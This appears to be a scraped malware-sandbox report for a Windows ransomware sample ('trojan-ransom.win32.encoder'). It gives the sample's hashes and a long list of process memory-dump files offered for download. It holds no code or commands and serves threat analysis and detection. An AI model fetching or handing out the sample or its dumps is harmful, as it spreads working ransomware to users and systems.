1377cad37c7ea78fda08cc727d25ddeb39c218d2b558cda792c072df4aaba48cb72320c7e1c287400e92f8f31b8fe149b43b4e913769567259639c81de7eaf77

Download Submit
\??\c:\users\admin\desktop\00395\trojan-ransom.win32.encoder.kis-db157f4e2d83d24ebe29edc7557773b031f62371a12238fb1b523f0c14e65f85.exe

Filesize
5.3MB

MD5
d64adbfb2a656bb4ad02586b19365805

SHA1
808ab6313e3488ddd633aadc622ade4b6af9c29d

SHA256
db157f4e2d83d24ebe29edc7557773b031f62371a12238fb1b523f0c14e65f85

SHA512
c3cc7832eb44603ac25beecea47ae44ea30a944420cc10a6d7e92404f08d8eb3ec2470b34beee3238806f7ba925df5bfb8afc7ddbdac2cb70bf4ea91dd49f453

Download Submit
memory/512-2142-0x00000000005D0000-0x0000000000932000-memory.dmp

Filesize
3.4MB

Download
memory/512-7452-0x00000000005D0000-0x0000000000932000-memory.dmp

Filesize
3.4MB

Download
memory/512-1130-0x00000000005D0000-0x0000000000932000-memory.dmp

Filesize
3.4MB

Download
memory/512-2141-0x00000000005D0000-0x0000000000932000-memory.dmp

Filesize
3.4MB

Download
memory/636-5172-0x0000000000400000-0x000000000053C000-memory.dmp

Filesize
1.2MB

Download
memory/752-6484-0x0000000000400000-0x00000000004AE000-memory.dmp

Filesize
696KB

Download
memory/1080-1151-0x00000000007A0000-0x0000000000BE4000-memory.dmp

Filesize
4.3MB

Download
memory/1080-2747-0x0000000005F40000-0x0000000005FA6000-memory.dmp

Filesize
408KB

Download
memory/1080-10356-0x00000000063E0000-0x00000000063FA000-memory.dmp

Filesize
104KB

Download
memory/1080-2132-0x00000000007A0000-0x0000000000BE4000-memory.dmp

Filesize
4.3MB

Download
memory/1080-75424-0x00000000007A0000-0x0000000000BE4000-memory.dmp

Filesize
4.3MB

Download
memory/1080-2268-0x00000000007A0000-0x0000000000BE4000-memory.dmp

Filesize
4.3MB

Download
memory/1080-2580-0x0000000006420000-0x00000000069C4000-memory.dmp

Filesize
5.6MB

Download
memory/1080-8927-0x00000000007A0000-0x0000000000BE4000-memory.dmp

Filesize
4.3MB

Download
memory/1080-10435-0x0000000006DC0000-0x0000000006E5C000-memory.dmp

Filesize
624KB

Download
memory/1532-7593-0x0000000000E30000-0x00000000014EC000-memory.dmp

Filesize
6.7MB

Download
memory/1532-2830-0x0000000007130000-0x00000000071C2000-memory.dmp

Filesize
584KB

Download
memory/1532-2616-0x0000000000E30000-0x00000000014EC000-memory.dmp

Filesize
6.7MB

Download
memory/1532-2541-0x0000000000E30000-0x00000000014EC000-memory.dmp

Filesize
6.7MB

Download
memory/1532-11872-0x0000000000E30000-0x00000000014EC000-memory.dmp

Filesize
6.7MB

Download
memory/1532-1150-0x0000000000E30000-0x00000000014EC000-memory.dmp

Filesize
6.7MB

Download
memory/2776-88-0x00000263CF150000-0x00000263CF172000-memory.dmp

Filesize
136KB

Download
memory/2776-91-0x00000263CEDD0000-0x00000263CEFEC000-memory.dmp

Filesize
2.1MB

Download
memory/2776-90-0x00000263CF5E0000-0x00000263CF656000-memory.dmp

Filesize
472KB

Download
memory/2776-89-0x00000263CF510000-0x00000263CF554000-memory.dmp

Filesize
272KB

Download
memory/2776-97-0x00000263CEE50000-0x00000263CEE6E000-memory.dmp

Filesize
120KB

Download
memory/3360-8081-0x0000000000400000-0x000000000046F000-memory.dmp

Filesize
444KB

Download
memory/4100-75901-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/4216-2147-0x0000000001060000-0x0000000001061000-memory.dmp

Filesize
4KB

Download
memory/4216-2144-0x0000000001010000-0x0000000001011000-memory.dmp

Filesize
4KB

Download
memory/4216-2300-0x0000000001080000-0x0000000001081000-memory.dmp

Filesize
4KB

Download
memory/4216-2146-0x0000000001050000-0x0000000001051000-memory.dmp

Filesize
4KB

Download
memory/4216-2145-0x0000000001020000-0x0000000001021000-memory.dmp

Filesize
4KB

Download
memory/4216-2143-0x0000000000DB0000-0x0000000000DB1000-memory.dmp

Filesize
4KB

Download
memory/4216-2148-0x0000000001070000-0x0000000001071000-memory.dmp

Filesize
4KB

Download
memory/4216-2301-0x0000000000400000-0x0000000000C85000-memory.dmp

Filesize
8.5MB

Download
memory/4344-58-0x0000020E59260000-0x0000020E59261000-memory.dmp

Filesize
4KB

Download
memory/4344-56-0x0000020E59260000-0x0000020E59261000-memory.dmp

Filesize
4KB

Download
memory/4344-57-0x0000020E59260000-0x0000020E59261000-memory.dmp

Filesize
4KB

Download
memory/4344-50-0x0000020E59260000-0x0000020E59261000-memory.dmp

Filesize
4KB

Download
memory/4344-62-0x0000020E59260000-0x0000020E59261000-memory.dmp

Filesize
4KB

Download
memory/4344-59-0x0000020E59260000-0x0000020E59261000-memory.dmp

Filesize
4KB

Download
memory/4344-61-0x0000020E59260000-0x0000020E59261000-memory.dmp

Filesize
4KB

Download
memory/4344-60-0x0000020E59260000-0x0000020E59261000-memory.dmp

Filesize
4KB

Download
memory/4344-51-0x0000020E59260000-0x0000020E59261000-memory.dmp

Filesize
4KB

Download
memory/4344-52-0x0000020E59260000-0x0000020E59261000-memory.dmp

Filesize
4KB

Download
memory/4392-9388-0x0000000000400000-0x0000000000421000-memory.dmp

Filesize
132KB

Download
memory/4392-9397-0x0000000000400000-0x0000000000421000-memory.dmp

Filesize
132KB

Download
memory/4392-9383-0x0000000000400000-0x0000000000421000-memory.dmp

Filesize
132KB

Download
memory/4392-9386-0x0000000000400000-0x0000000000421000-memory.dmp

Filesize
132KB

Download
memory/4392-9395-0x0000000000400000-0x0000000000421000-memory.dmp

Filesize
132KB

Download
memory/4392-9384-0x0000000000400000-0x0000000000421000-memory.dmp

Filesize
132KB

Download
memory/4392-9385-0x0000000000400000-0x0000000000421000-memory.dmp

Filesize
132KB

Download
memory/4392-9387-0x0000000000400000-0x0000000000421000-memory.dmp

Filesize
132KB

Download
memory/4392-9389-0x0000000000400000-0x0000000000421000-memory.dmp

Filesize
132KB

Download
memory/4392-9390-0x0000000000400000-0x0000000000421000-memory.dmp

Filesize
132KB

Download
memory/4392-1154-0x0000000000400000-0x0000000000421000-memory.dmp

Filesize
132KB

Download
memory/4392-9391-0x0000000000400000-0x0000000000421000-memory.dmp

Filesize
132KB

Download
memory/4392-9393-0x0000000000400000-0x0000000000421000-memory.dmp

Filesize
132KB

Download
memory/4392-1155-0x0000000000400000-0x0000000000421000-memory.dmp

Filesize
132KB

Download
memory/4392-9392-0x0000000000400000-0x0000000000421000-memory.dmp

Filesize
132KB

Download
memory/4392-9394-0x0000000000400000-0x0000000000421000-memory.dmp

Filesize
132KB

Download
memory/4392-9396-0x0000000000400000-0x0000000000421000-memory.dmp

Filesize
132KB

Download
memory/4392-6653-0x0000000000400000-0x0000000000421000-memory.dmp

Filesize
132KB

Download
memory/4392-9398-0x0000000000400000-0x0000000000421000-memory.dmp

Filesize
132KB

Download
memory/4392-9399-0x0000000000400000-0x0000000000421000-memory.dmp

Filesize
132KB

Download
memory/4392-9400-0x0000000000400000-0x0000000000421000-memory.dmp

Filesize
132KB

Download
memory/4392-9402-0x0000000000400000-0x0000000000421000-memory.dmp

Filesize
132KB

Download
memory/4392-9403-0x0000000000400000-0x0000000000421000-memory.dmp

Filesize
132KB

Download
memory/4392-9404-0x0000000000400000-0x0000000000421000-memory.dmp

Filesize
132KB

Download
memory/4392-9405-0x0000000000400000-0x0000000000421000-memory.dmp

Filesize
132KB

Download
memory/4392-9406-0x0000000000400000-0x0000000000421000-memory.dmp

Filesize
132KB

Download
memory/4392-9401-0x0000000000400000-0x0000000000421000-memory.dmp

Filesize
132KB

Download
memory/4392-9407-0x0000000000400000-0x0000000000421000-memory.dmp

Filesize
132KB

Download
memory/5452-75762-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/6288-76010-0x0000000006140000-0x000000000618C000-memory.dmp

Filesize
304KB

Download
memory/6532-75833-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/7424-75923-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/7516-76038-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/12652-75759-0x0000000006760000-0x000000000677E000-memory.dmp

Filesize
120KB

Download
memory/12652-75669-0x00000000059C0000-0x0000000005FE8000-memory.dmp

Filesize
6.2MB

Download
memory/12652-75702-0x0000000005FF0000-0x0000000006012000-memory.dmp

Filesize
136KB

Download
memory/12652-75704-0x0000000006090000-0x00000000060F6000-memory.dmp

Filesize
408KB

Download
memory/12652-75714-0x0000000006180000-0x00000000064D4000-memory.dmp

Filesize
3.3MB

Download
memory/12652-75844-0x0000000007FA0000-0x000000000861A000-memory.dmp

Filesize
6.5MB

Download
memory/12652-75845-0x0000000006CB0000-0x0000000006CCA000-memory.dmp

Filesize
104KB

Download
memory/12652-75764-0x00000000068A0000-0x00000000068EC000-memory.dmp

Filesize
304KB

Download
memory/12652-75664-0x0000000002E60000-0x0000000002E96000-memory.dmp

Filesize
216KB

Download
memory/12672-75805-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/12924-75864-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/14164-76056-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/14268-75637-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/14820-75491-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/14820-75748-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/15260-75729-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/16304-75616-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/16492-75688-0x0000000000950000-0x0000000000D94000-memory.dmp

Filesize
4.3MB

Download
memory/16492-75421-0x0000000000950000-0x0000000000D94000-memory.dmp

Filesize
4.3MB

Download
memory/16492-75431-0x0000000000950000-0x0000000000D94000-memory.dmp

Filesize
4.3MB

Download
memory/16492-75811-0x0000000000950000-0x0000000000D94000-memory.dmp

Filesize
4.3MB

Download
memory/16492-75432-0x0000000000950000-0x0000000000D94000-memory.dmp

Filesize
4.3MB

Download